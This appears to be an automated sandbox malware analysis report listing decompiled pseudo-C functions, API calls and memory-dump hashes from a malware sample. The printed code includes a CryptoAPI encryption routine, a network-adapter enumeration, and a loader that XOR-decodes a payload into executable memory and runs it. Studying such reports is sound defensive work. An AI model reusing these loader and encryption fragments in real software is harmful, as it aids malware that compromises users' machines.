                                                                                                                                                                                                                                                                                          • CryptHashData.ADVAPI32(?,?,000002F0,00000000), ref: 040049CC
                                                                                                                                                                                                                                                                                          • CryptGetHashParam.ADVAPI32(?,00000004,00000000,00000004,00000000), ref: 04004A07
                                                                                                                                                                                                                                                                                          • CryptGetHashParam.ADVAPI32(?,00000002,?,00000010,00000000), ref: 04004A34
                                                                                                                                                                                                                                                                                          • CryptDestroyHash.ADVAPI32(?), ref: 04004A7D
                                                                                                                                                                                                                                                                                          • CryptDestroyHash.ADVAPI32(00000000), ref: 04004A8A
                                                                                                                                                                                                                                                                                          • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 04004AA5
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.730634851.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.730592213.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.730732791.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.730766607.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_4000000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Crypt$Hash$Destroy$CreateDataParam$ContextDecryptDeriveRelease
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 2727466597-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 56f7e97ff9290496e290980ffb5b481f03a5a3792702acde3772e2a43a98712a
                                                                                                                                                                                                                                                                                          • Instruction ID: 825b94236ad970d67c54706e51f03fb1cf2707309f33405f466b5fd67a115f37
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 56f7e97ff9290496e290980ffb5b481f03a5a3792702acde3772e2a43a98712a
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E251FD71A54318ABEB65CF50CC45FEA77BCAB48B04F008598F609B61C0DB79AB84CF54
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 82%
                                                                                                                                                                                                                                                                                          			E04008970(intOrPtr _a4, intOrPtr* _a8, BYTE* _a12, int _a16) {
                                                                                                                                                                                                                                                                                          				int _v8;
                                                                                                                                                                                                                                                                                          				long* _v12;
                                                                                                                                                                                                                                                                                          				long _v16;
                                                                                                                                                                                                                                                                                          				long* _v20;
                                                                                                                                                                                                                                                                                          				char* _t27;
                                                                                                                                                                                                                                                                                          				int _t28;
                                                                                                                                                                                                                                                                                          				int _t33;
                                                                                                                                                                                                                                                                                          				char* _t47;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_v8 = 0;
                                                                                                                                                                                                                                                                                          				if(_a4 == 0 || _a8 == 0 || _a12 == 0 || _a16 == 0) {
                                                                                                                                                                                                                                                                                          					L12:
                                                                                                                                                                                                                                                                                          					return _v8;
                                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                                          					_v12 = 0;
                                                                                                                                                                                                                                                                                          					_t27 =  *0x4013370; // 0x400c6e4
                                                                                                                                                                                                                                                                                          					_t28 = CryptAcquireContextA( &_v12, _t27, "Microsoft Enhanced Cryptographic Provider v1.0", 1, 0); // executed
                                                                                                                                                                                                                                                                                          					if(_t28 == 0) {
                                                                                                                                                                                                                                                                                          						_v16 = GetLastError();
                                                                                                                                                                                                                                                                                          						if(_v16 == 0x80090016 || _v16 == 0x8009000b) {
                                                                                                                                                                                                                                                                                          							_t47 =  *0x4013370; // 0x400c6e4
                                                                                                                                                                                                                                                                                          							CryptAcquireContextA( &_v12, _t47, "Microsoft Enhanced Cryptographic Provider v1.0", 1, 8);
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					if(_v12 != 0) {
                                                                                                                                                                                                                                                                                          						_v20 = 0;
                                                                                                                                                                                                                                                                                          						if(CryptImportKey(_v12, _a12, _a16, 0, 1,  &_v20) != 0) {
                                                                                                                                                                                                                                                                                          							_t33 = _v20;
                                                                                                                                                                                                                                                                                          							__imp__CryptEncrypt(_t33, 0, 1, 0, _a4, _a8,  *_a8); // executed
                                                                                                                                                                                                                                                                                          							_v8 = _t33;
                                                                                                                                                                                                                                                                                          							CryptDestroyKey(_v20);
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						CryptReleaseContext(_v12, 0);
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					goto L12;
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          			}











                                                                                                                                                                                                                                                                                          0x04008976
                                                                                                                                                                                                                                                                                          0x04008981
                                                                                                                                                                                                                                                                                          0x04008a60
                                                                                                                                                                                                                                                                                          0x04008a66
                                                                                                                                                                                                                                                                                          0x040089a5
                                                                                                                                                                                                                                                                                          0x040089a5
                                                                                                                                                                                                                                                                                          0x040089b5
                                                                                                                                                                                                                                                                                          0x040089bf
                                                                                                                                                                                                                                                                                          0x040089c7
                                                                                                                                                                                                                                                                                          0x040089cf
                                                                                                                                                                                                                                                                                          0x040089d9
                                                                                                                                                                                                                                                                                          0x040089ed
                                                                                                                                                                                                                                                                                          0x040089f8
                                                                                                                                                                                                                                                                                          0x040089f8
                                                                                                                                                                                                                                                                                          0x040089d9
                                                                                                                                                                                                                                                                                          0x04008a02
                                                                                                                                                                                                                                                                                          0x04008a04
                                                                                                                                                                                                                                                                                          0x04008a27
                                                                                                                                                                                                                                                                                          0x04008a3d
                                                                                                                                                                                                                                                                                          0x04008a41
                                                                                                                                                                                                                                                                                          0x04008a47
                                                                                                                                                                                                                                                                                          0x04008a4e
                                                                                                                                                                                                                                                                                          0x04008a4e
                                                                                                                                                                                                                                                                                          0x04008a5a
                                                                                                                                                                                                                                                                                          0x04008a5a
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x04008a02

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • CryptAcquireContextA.ADVAPI32(00000000,0400C6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000), ref: 040089BF
                                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 040089C9
                                                                                                                                                                                                                                                                                          • CryptAcquireContextA.ADVAPI32(00000000,0400C6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008), ref: 040089F8
                                                                                                                                                                                                                                                                                          • CryptImportKey.ADVAPI32(00000000,00000000,00000000,00000000,00000001,00000000), ref: 04008A1F
                                                                                                                                                                                                                                                                                          • CryptEncrypt.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00000000,00000000), ref: 04008A41
                                                                                                                                                                                                                                                                                          • CryptDestroyKey.ADVAPI32(00000000), ref: 04008A4E
                                                                                                                                                                                                                                                                                          • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 04008A5A
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          • Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 040089E8
                                                                                                                                                                                                                                                                                          • Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 040089B0
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.730634851.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.730592213.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.730732791.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.730766607.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_4000000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Crypt$Context$Acquire$DestroyEncryptErrorImportLastRelease
                                                                                                                                                                                                                                                                                          • String ID: Microsoft Enhanced Cryptographic Provider v1.0$Microsoft Enhanced Cryptographic Provider v1.0
                                                                                                                                                                                                                                                                                          • API String ID: 3736710109-947817771
                                                                                                                                                                                                                                                                                          • Opcode ID: a580c414a6f780aecf9ca1925e7721a486cca4ea517db96ead6d5debf2f75543
                                                                                                                                                                                                                                                                                          • Instruction ID: 073036156a227ab269f6199982c6e62e9abf2561c3e32999b52b046b74d0c6c6
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a580c414a6f780aecf9ca1925e7721a486cca4ea517db96ead6d5debf2f75543
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D231FD75A40208EFFB54DFA4C849BAE77B9FB44701F14C658F605B62C0D7B8AA80CB51
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 63%
                                                                                                                                                                                                                                                                                          			E000FA0B0(void* __eflags, intOrPtr _a12, intOrPtr _a16) {
                                                                                                                                                                                                                                                                                          				char _v260;
                                                                                                                                                                                                                                                                                          				void* _v264;
                                                                                                                                                                                                                                                                                          				void* _v268;
                                                                                                                                                                                                                                                                                          				struct HINSTANCE__* _t24;
                                                                                                                                                                                                                                                                                          				void* _t26;
                                                                                                                                                                                                                                                                                          				intOrPtr* _t34;
                                                                                                                                                                                                                                                                                          				intOrPtr* _t35;
                                                                                                                                                                                                                                                                                          				signed int _t54;
                                                                                                                                                                                                                                                                                          				void* _t66;
                                                                                                                                                                                                                                                                                          				struct HINSTANCE__* _t70;
                                                                                                                                                                                                                                                                                          				intOrPtr* _t71;
                                                                                                                                                                                                                                                                                          				signed int _t74;
                                                                                                                                                                                                                                                                                          				void* _t77;
                                                                                                                                                                                                                                                                                          				void* _t79;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_t79 = __eflags;
                                                                                                                                                                                                                                                                                          				E000F4A40();
                                                                                                                                                                                                                                                                                          				_t24 = LoadLibraryA("RICHED20.DLL"); // executed
                                                                                                                                                                                                                                                                                          				_push(0x40);
                                                                                                                                                                                                                                                                                          				_push(0x3000);
                                                                                                                                                                                                                                                                                          				_t70 = _t24;
                                                                                                                                                                                                                                                                                          				_push( &_v264);
                                                                                                                                                                                                                                                                                          				_push(0);
                                                                                                                                                                                                                                                                                          				_push( &_v268);
                                                                                                                                                                                                                                                                                          				_push(0xffffffff);
                                                                                                                                                                                                                                                                                          				_v260 = 0;
                                                                                                                                                                                                                                                                                          				_v268 = 0;
                                                                                                                                                                                                                                                                                          				_v264 = 0x14d44;
                                                                                                                                                                                                                                                                                          				_t26 = E001054F5(_t79); // executed
                                                                                                                                                                                                                                                                                          				_t77 = (_t74 & 0xfffffff8) - 0x10c + 0x18;
                                                                                                                                                                                                                                                                                          				if(_t26 >= 0) {
                                                                                                                                                                                                                                                                                          					_t54 = 0;
                                                                                                                                                                                                                                                                                          					__eflags = _v264;
                                                                                                                                                                                                                                                                                          					if(__eflags > 0) {
                                                                                                                                                                                                                                                                                          						do {
                                                                                                                                                                                                                                                                                          							_t11 = _t54 - (((0x84210843 * _t54 >> 0x20) + _t54 >> 4 >> 0x1f) + ((0x84210843 * _t54 >> 0x20) + _t54 >> 4) << 5) - ((0x84210843 * _t54 >> 0x20) + _t54 >> 4 >> 0x1f) + ((0x84210843 * _t54 >> 0x20) + _t54 >> 4) + "ck?<PMVf>sn+p%d(>M!s$?ch*owqz+"; // 0x3c3f6b63
                                                                                                                                                                                                                                                                                          							_t12 = _t54 + 0x15bdb8; // 0x3c3f6b8b
                                                                                                                                                                                                                                                                                          							 *(_t54 + _v268) =  *_t11 ^  *_t12;
                                                                                                                                                                                                                                                                                          							_t54 = _t54 + 1;
                                                                                                                                                                                                                                                                                          							__eflags = _t54 - _v264;
                                                                                                                                                                                                                                                                                          						} while (__eflags < 0);
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					_v268();
                                                                                                                                                                                                                                                                                          					_t66 = E000F9F00( &_v260, __eflags, _a12, _a16);
                                                                                                                                                                                                                                                                                          					FreeLibrary(_t70);
                                                                                                                                                                                                                                                                                          					E000F4BA0();
                                                                                                                                                                                                                                                                                          					_t71 =  *0x1719f0; // 0x2541058
                                                                                                                                                                                                                                                                                          					__eflags = _t71;
                                                                                                                                                                                                                                                                                          					if(_t71 != 0) {
                                                                                                                                                                                                                                                                                          						_t34 =  *_t71;
                                                                                                                                                                                                                                                                                          						__eflags = _t34;
                                                                                                                                                                                                                                                                                          						if(_t34 != 0) {
                                                                                                                                                                                                                                                                                          							E00105DE2(_t34);
                                                                                                                                                                                                                                                                                          							_t77 = _t77 + 4;
                                                                                                                                                                                                                                                                                          							 *_t71 = 0;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						_t20 = _t71 + 4; // 0x0
                                                                                                                                                                                                                                                                                          						_t35 =  *_t20;
                                                                                                                                                                                                                                                                                          						__eflags = _t35;
                                                                                                                                                                                                                                                                                          						if(_t35 != 0) {
                                                                                                                                                                                                                                                                                          							E00105DE2(_t35);
                                                                                                                                                                                                                                                                                          							_t77 = _t77 + 4;
                                                                                                                                                                                                                                                                                          							 *((intOrPtr*)(_t71 + 4)) = 0;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						_push(_t71);
                                                                                                                                                                                                                                                                                          						 *((intOrPtr*)(_t71 + 8)) = 0;
                                                                                                                                                                                                                                                                                          						E001059DB();
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					E000F4700();
                                                                                                                                                                                                                                                                                          					return _t66;
                                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                                          					MessageBoxA(0, "NtAllocateVirtualMemory - Fail", 0, 0);
                                                                                                                                                                                                                                                                                          					return 0;
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          			}

















                                                                                                                                                                                                                                                                                          0x000fa0b0
                                                                                                                                                                                                                                                                                          0x000fa0bf
                                                                                                                                                                                                                                                                                          0x000fa0c9
                                                                                                                                                                                                                                                                                          0x000fa0cf
                                                                                                                                                                                                                                                                                          0x000fa0d1
                                                                                                                                                                                                                                                                                          0x000fa0d6
                                                                                                                                                                                                                                                                                          0x000fa0dc
                                                                                                                                                                                                                                                                                          0x000fa0df
                                                                                                                                                                                                                                                                                          0x000fa0e4
                                                                                                                                                                                                                                                                                          0x000fa0e5
                                                                                                                                                                                                                                                                                          0x000fa0e7
                                                                                                                                                                                                                                                                                          0x000fa0eb
                                                                                                                                                                                                                                                                                          0x000fa0ef
                                                                                                                                                                                                                                                                                          0x000fa0f7
                                                                                                                                                                                                                                                                                          0x000fa0fc
                                                                                                                                                                                                                                                                                          0x000fa101
                                                                                                                                                                                                                                                                                          0x000fa11c
                                                                                                                                                                                                                                                                                          0x000fa11e
                                                                                                                                                                                                                                                                                          0x000fa122
                                                                                                                                                                                                                                                                                          0x000fa124
                                                                                                                                                                                                                                                                                          0x000fa142
                                                                                                                                                                                                                                                                                          0x000fa148
                                                                                                                                                                                                                                                                                          0x000fa152
                                                                                                                                                                                                                                                                                          0x000fa155
                                                                                                                                                                                                                                                                                          0x000fa156
                                                                                                                                                                                                                                                                                          0x000fa156
                                                                                                                                                                                                                                                                                          0x000fa124
                                                                                                                                                                                                                                                                                          0x000fa15c
                                                                                                                                                                                                                                                                                          0x000fa172
                                                                                                                                                                                                                                                                                          0x000fa174
                                                                                                                                                                                                                                                                                          0x000fa17a
                                                                                                                                                                                                                                                                                          0x000fa17f
                                                                                                                                                                                                                                                                                          0x000fa185
                                                                                                                                                                                                                                                                                          0x000fa187
                                                                                                                                                                                                                                                                                          0x000fa189
                                                                                                                                                                                                                                                                                          0x000fa18b
                                                                                                                                                                                                                                                                                          0x000fa18d
                                                                                                                                                                                                                                                                                          0x000fa190
                                                                                                                                                                                                                                                                                          0x000fa195
                                                                                                                                                                                                                                                                                          0x000fa198
                                                                                                                                                                                                                                                                                          0x000fa198
                                                                                                                                                                                                                                                                                          0x000fa19a
                                                                                                                                                                                                                                                                                          0x000fa19a
                                                                                                                                                                                                                                                                                          0x000fa19d
                                                                                                                                                                                                                                                                                          0x000fa19f
                                                                                                                                                                                                                                                                                          0x000fa1a2
                                                                                                                                                                                                                                                                                          0x000fa1a7
                                                                                                                                                                                                                                                                                          0x000fa1aa
                                                                                                                                                                                                                                                                                          0x000fa1aa
                                                                                                                                                                                                                                                                                          0x000fa1ad
                                                                                                                                                                                                                                                                                          0x000fa1ae
                                                                                                                                                                                                                                                                                          0x000fa1b1
                                                                                                                                                                                                                                                                                          0x000fa1b6
                                                                                                                                                                                                                                                                                          0x000fa1b9
                                                                                                                                                                                                                                                                                          0x000fa1c6
                                                                                                                                                                                                                                                                                          0x000fa103
                                                                                                                                                                                                                                                                                          0x000fa10b
                                                                                                                                                                                                                                                                                          0x000fa119
                                                                                                                                                                                                                                                                                          0x000fa119

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                            • Part of subcall function 000F4A40: GetCurrentThreadId.KERNEL32 ref: 000F4A7B
                                                                                                                                                                                                                                                                                          • LoadLibraryA.KERNEL32(RICHED20.DLL), ref: 000FA0C9
                                                                                                                                                                                                                                                                                          • MessageBoxA.USER32 ref: 000FA10B
                                                                                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000,?,00003000,00000040), ref: 000FA174
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.711567392.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.711475414.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712610122.0000000000159000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712714995.000000000015C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713013679.0000000000170000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713099356.0000000000173000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_f0000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Library$CurrentFreeLoadMessageThread
                                                                                                                                                                                                                                                                                          • String ID: NtAllocateVirtualMemory - Fail$RICHED20.DLL
                                                                                                                                                                                                                                                                                          • API String ID: 2057254942-2284438529
                                                                                                                                                                                                                                                                                          • Opcode ID: f9b3373f62978de2ad33f99d2def47dbba277617830d13477bf78435cf5ac1aa
                                                                                                                                                                                                                                                                                          • Instruction ID: 2b5eb552edc8930ba92c006121cb5f9c6b42bd4af2a1c9d39a5d76fc57d78a37
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f9b3373f62978de2ad33f99d2def47dbba277617830d13477bf78435cf5ac1aa
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 933128B2A042055FD304EF68DC859AB77D9FB89310F14463DFA99C7682E770EC4487A2
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.711567392.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.711475414.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712610122.0000000000159000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712714995.000000000015C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713013679.0000000000170000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713099356.0000000000173000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_f0000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                                          • Opcode ID: 8d9e57d56f03e4eb32d98c043259f0602398652354d549f7fd47c3a79d251fb8
                                                                                                                                                                                                                                                                                          • Instruction ID: e91084eaa29ae535d06377dd280b6fe89e857b3bada7e80f0f34bfbc209c5746
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8d9e57d56f03e4eb32d98c043259f0602398652354d549f7fd47c3a79d251fb8
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8AD05E7909AA80D7DE14CB2085A5A2B7351FBE7B01F11BD28D04B87541E7785C08C805
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 87%
                                                                                                                                                                                                                                                                                          			E04009F70(intOrPtr _a4, signed int _a8, intOrPtr* _a12) {
                                                                                                                                                                                                                                                                                          				intOrPtr _v8;
                                                                                                                                                                                                                                                                                          				void* _v12;
                                                                                                                                                                                                                                                                                          				void* _v16;
                                                                                                                                                                                                                                                                                          				signed int _v20;
                                                                                                                                                                                                                                                                                          				intOrPtr _v24;
                                                                                                                                                                                                                                                                                          				intOrPtr* _v28;
                                                                                                                                                                                                                                                                                          				void* _v32;
                                                                                                                                                                                                                                                                                          				intOrPtr* _t59;
                                                                                                                                                                                                                                                                                          				intOrPtr _t64;
                                                                                                                                                                                                                                                                                          				void* _t99;
                                                                                                                                                                                                                                                                                          				void* _t100;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_v8 = 1;
                                                                                                                                                                                                                                                                                          				if(_a4 != 0) {
                                                                                                                                                                                                                                                                                          					_t103 = _a8 - 5;
                                                                                                                                                                                                                                                                                          					if(_a8 > 5) {
                                                                                                                                                                                                                                                                                          						asm("cdq");
                                                                                                                                                                                                                                                                                          						_t59 = E040097A0( ~(0 | _t103 > 0x00000000) | _a8 / 0x00000006 * 0x00000288); // executed
                                                                                                                                                                                                                                                                                          						_t100 = _t99 + 4;
                                                                                                                                                                                                                                                                                          						_v28 = _t59;
                                                                                                                                                                                                                                                                                          						_v12 = _v28;
                                                                                                                                                                                                                                                                                          						if(_v12 != 0) {
                                                                                                                                                                                                                                                                                          							_v16 = _v12;
                                                                                                                                                                                                                                                                                          							_v20 = _a8 * 0x288 / 6;
                                                                                                                                                                                                                                                                                          							_push( &_v20);
                                                                                                                                                                                                                                                                                          							_t64 = _v12;
                                                                                                                                                                                                                                                                                          							_push(_t64); // executed
                                                                                                                                                                                                                                                                                          							L0400B1DA(); // executed
                                                                                                                                                                                                                                                                                          							if(_t64 == 0) {
                                                                                                                                                                                                                                                                                          								_v24 = 0;
                                                                                                                                                                                                                                                                                          								while(_v12 != 0 && _v24 < _a8) {
                                                                                                                                                                                                                                                                                          									if( *((intOrPtr*)(_v12 + 0x190)) < _a8 - _v24) {
                                                                                                                                                                                                                                                                                          										E04007B70(_a4 + _v24, _v12 + 0x194,  *((intOrPtr*)(_v12 + 0x190)));
                                                                                                                                                                                                                                                                                          										_t100 = _t100 + 0xc;
                                                                                                                                                                                                                                                                                          										_v24 = _v24 +  *((intOrPtr*)(_v12 + 0x190));
                                                                                                                                                                                                                                                                                          										_v12 =  *_v12;
                                                                                                                                                                                                                                                                                          										_v8 = 1;
                                                                                                                                                                                                                                                                                          										continue;
                                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                                          									break;
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          								 *_a12 = _v24;
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							_v32 = _v16;
                                                                                                                                                                                                                                                                                          							E040097C0(_v32);
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				return _v8;
                                                                                                                                                                                                                                                                                          			}














                                                                                                                                                                                                                                                                                          0x04009f76
                                                                                                                                                                                                                                                                                          0x04009f81
                                                                                                                                                                                                                                                                                          0x04009f87
                                                                                                                                                                                                                                                                                          0x04009f8b
                                                                                                                                                                                                                                                                                          0x04009f94
                                                                                                                                                                                                                                                                                          0x04009fad
                                                                                                                                                                                                                                                                                          0x04009fb2
                                                                                                                                                                                                                                                                                          0x04009fb5
                                                                                                                                                                                                                                                                                          0x04009fbb
                                                                                                                                                                                                                                                                                          0x04009fc2
                                                                                                                                                                                                                                                                                          0x04009fcb
                                                                                                                                                                                                                                                                                          0x04009fe0
                                                                                                                                                                                                                                                                                          0x04009fe6
                                                                                                                                                                                                                                                                                          0x04009fe7
                                                                                                                                                                                                                                                                                          0x04009fea
                                                                                                                                                                                                                                                                                          0x04009feb
                                                                                                                                                                                                                                                                                          0x04009ff2
                                                                                                                                                                                                                                                                                          0x04009ff4
                                                                                                                                                                                                                                                                                          0x04009ffb
                                                                                                                                                                                                                                                                                          0x0400a018
                                                                                                                                                                                                                                                                                          0x0400a034
                                                                                                                                                                                                                                                                                          0x0400a039
                                                                                                                                                                                                                                                                                          0x0400a048
                                                                                                                                                                                                                                                                                          0x0400a050
                                                                                                                                                                                                                                                                                          0x0400a053
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x0400a05e
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x0400a018
                                                                                                                                                                                                                                                                                          0x0400a066
                                                                                                                                                                                                                                                                                          0x0400a066
                                                                                                                                                                                                                                                                                          0x0400a06b
                                                                                                                                                                                                                                                                                          0x0400a072
                                                                                                                                                                                                                                                                                          0x0400a077
                                                                                                                                                                                                                                                                                          0x04009fc2
                                                                                                                                                                                                                                                                                          0x04009f8b
                                                                                                                                                                                                                                                                                          0x0400a080

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                            • Part of subcall function 040097A0: GetProcessHeap.KERNEL32(00000008,04009FB2,?,04009FB2,00000000,?,?,?,04009E2D), ref: 040097A9
                                                                                                                                                                                                                                                                                            • Part of subcall function 040097A0: RtlAllocateHeap.NTDLL(00000000,?,04009FB2,00000000,?,?,?,04009E2D), ref: 040097B0
                                                                                                                                                                                                                                                                                          • GetAdaptersInfo.IPHLPAPI(00000000,04009E2D), ref: 04009FEB
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.730634851.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.730592213.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.730732791.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.730766607.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_4000000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Heap$AdaptersAllocateInfoProcess
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 1318000056-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 73ff96f27f52de9840d8f092c1af349ff5175d9842f98ddb7f52f1a4bac05a00
                                                                                                                                                                                                                                                                                          • Instruction ID: 97f005e152f21f2c2f7fd10924b0caa403664ba6d1ad8a9a516f1bf18f754b30
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 73ff96f27f52de9840d8f092c1af349ff5175d9842f98ddb7f52f1a4bac05a00
